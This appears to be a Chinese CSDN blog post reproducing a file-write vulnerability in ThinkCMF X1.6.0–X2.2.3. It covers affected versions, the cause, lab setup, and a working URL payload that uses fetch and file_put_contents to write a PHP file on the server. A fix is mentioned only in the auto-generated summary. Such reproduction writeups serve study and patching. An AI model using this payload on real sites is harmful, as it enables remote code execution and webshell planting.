ThinkCMF上传漏洞

这篇博客详细介绍了ThinkCMF X1.6.0到X2.2.3版本存在的上传漏洞,攻击者可以利用该漏洞构造特定URL实现远程代码执行。环境搭建过程包括下载ThinkCMF X2.2.0并使用phpstudy。漏洞复现步骤包括输入特定payload以创建恶意文件。修复方案为修改HomebaseController.class.php和AdminbaseController.class.php中display和fetch函数的访问权限为protected。
摘要由CSDN通过智能技术生成

ThinkCMF上传漏洞

一.漏洞描述

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

二.漏洞原理

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

三.环境搭建

下载ThinkCMF X2.2.0 链接:https://pan.baidu.com/s/1dEJJoU9?errno=0&errmsg=Auth%20Login%20Sucess&&bduss=&ssnerror=0&traceid=
使用phpstudy搭建即可

四.漏洞复现

访问目标网站,如下图所示:
在这里插入图片描述
输入payload:
?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)
后回车

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值